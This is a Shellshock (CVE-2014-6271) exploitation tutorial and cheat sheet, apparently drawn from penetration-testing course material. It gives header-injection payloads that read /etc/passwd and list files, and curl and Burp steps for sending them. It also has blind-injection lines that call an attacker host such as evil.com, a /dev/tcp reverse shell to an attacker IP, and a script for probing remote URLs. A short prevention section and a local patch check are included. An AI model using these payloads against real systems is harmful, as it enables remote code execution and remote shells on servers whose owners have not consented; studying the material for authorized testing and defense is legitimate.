Shellshock
What is it?
Shellshock (CVE-2014-6271) is a bug in how bash parsed function definitions passed in through environment variables: a variable whose value begins with "() {" is imported as a function, and vulnerable versions of bash kept executing whatever followed the closing brace. Any program that starts bash with attacker-controlled environment variables is exposed. On a web server that means CGI scripts (the server copies request headers into HTTP_* environment variables before running the script) and back ends that call popen() or system() on a system where /bin/sh is bash (@lcamtuf). Where /bin/sh is dash, popen() and system() are not affected, but a CGI script that starts with #!/bin/bash still is, so the real fix is patching bash rather than swapping shells.
An example is a site (e.g. http://test.com/serverstats.cgi) that runs a /bin/bash script. The page source shows it issues a simple GET request to that script; because the script is interpreted by /bin/bash, setting the User-Agent, Referer or Cookie header to a function-definition payload gives remote code execution on the server.
Use echo as padding: the injected command runs before the CGI script prints its own headers, and without the blank line that echo emits the web server sees a malformed header block and returns a 500 error instead of the command output.
HTTP_USER_AGENT='() { :;};echo;/usr/bin/id'
# HTTP_USER_AGENT is the CGI environment variable the web server fills from the User-Agent header; the rest of the value is the Shellshock injection
# () { :;} is the Shellshock prefix: it makes bash import the variable as a function whose body is :, the do-nothing builtin
# ;echo is padding: it prints a blank line that ends the HTTP header block, which avoids server errors when injecting through headers
# ;/usr/bin/id is the command bash executes while importing the variable; ping or nslookup to a host you control confirms blind injection
Exploiting
You can use the curl command or Burp Repeater to modify the request quickly.
Burp: intercept the GET request to the CGI script, send it to Repeater and replace the User-Agent (or Referer/Cookie) value with the payload (screenshot: see Picture under References).
Curl (-A sets the User-Agent header; use -H "Referer: ..." or -H "Cookie: ..." to try the other headers)
curl -A "() { :;};echo;/bin/ls -la /" http://$IP/test
Cheat Sheet
Shellshock Injection Payloads
() { :;};echo;/bin/ls -la / # View files on root directory
() { :;};echo;/usr/bin/id # See user running server
() { :;};echo;/bin/cat /etc/passwd # Enumerate users
Blind Shellshock Injection (no output comes back; watch for the ICMP or DNS traffic on a host you control)
() { :;};echo; ping -c 4 <YourIP> # confirm execution via ICMP to your host
() { :;};echo; nslookup abc123.evil.com # confirm execution via a DNS lookup for a name you control
Reverse Shell Payload (start a listener on port 9000 on <YourIP> first)
() { :;};echo;/bin/bash -i > /dev/tcp/<YourIP>/9000 0<&1 2>&1 # interactive bash with stdin, stdout and stderr attached to the TCP socket
Display Kernel Version
() { :;};echo;/bin/uname -a
Prevention
Update bash to a patched version on every host (the fix makes bash ignore anything after the function body when importing environment variables) and verify the fix rather than assuming it. Where you cannot patch immediately, avoid spawning bash with untrusted environment variables: prefer dash for /bin/sh, do not run CGI scripts under bash, and filter request headers containing "() {" at the web server or WAF as a stopgap only.
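The following helper, added here and not part of the original page or the SEC542 demo, ties the injection explanation above to the prevention check: it builds the header value, probes a URL by echoing a unique marker through a chosen header (the standard way to confirm Shellshock without guessing at command output), and tests a local bash binary for the bug. It assumes curl is installed; the target URL, header name and binary path are supplied by the caller.

```shell
#!/bin/sh
# Added example (not from the original page). POSIX sh; assumes curl is available.

# Build the header value: function-definition prefix, the echo that emits the
# blank line ending the CGI header block, then the command to run.
shellshock_payload() {
    printf '() { :;};echo;%s' "$1"
}

# Probe a URL (hypothetical target supplied by the caller) by injecting a unique
# marker through the chosen header (default User-Agent). Returns 0 when the
# marker comes back in the response body, i.e. the command executed.
shellshock_probe() {
    url="$1"
    header="${2:-User-Agent}"
    marker="ss$$$(date +%s)"
    body=$(curl -s -H "$header: $(shellshock_payload "echo $marker")" "$url")
    case "$body" in
        *"$marker"*) echo "[+] $url executes commands via $header"; return 0 ;;
        *)           echo "[-] marker not echoed via $header"; return 1 ;;
    esac
}

# Local check for the prevention step: export a function definition with a
# trailing command and see whether the given bash runs it on startup.
# Returns 0 if vulnerable, 1 if patched, 2 if the binary is missing.
shellshock_local_check() {
    bin="${1:-/bin/bash}"
    [ -x "$bin" ] || { echo "[?] $bin not found"; return 2; }
    out=$(env x='() { :;}; echo VULNERABLE' "$bin" -c 'echo test' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "[!] $bin is vulnerable to Shellshock"; return 0 ;;
        *)            echo "[ok] $bin ignores the trailing command"; return 1 ;;
    esac
}

# Usage:
#   shellshock_probe http://$IP/serverstats.cgi            # via User-Agent
#   shellshock_probe http://$IP/serverstats.cgi Referer    # via Referer
#   shellshock_local_check /bin/bash
```

The probe deliberately echoes a marker rather than running id: a marker cannot be confused with page content, and the same function works against any of the three headers the page lists. The local check is the one to run after patching; a patched bash prints only "test".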
References
[Ref1]: SANS SEC542 (Web App Penetration Testing and Ethical Hacking) course demo, https://www.sans.org/course/web-app-penetration-testing-ethical-hacking
Picture (Burp screenshot): https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/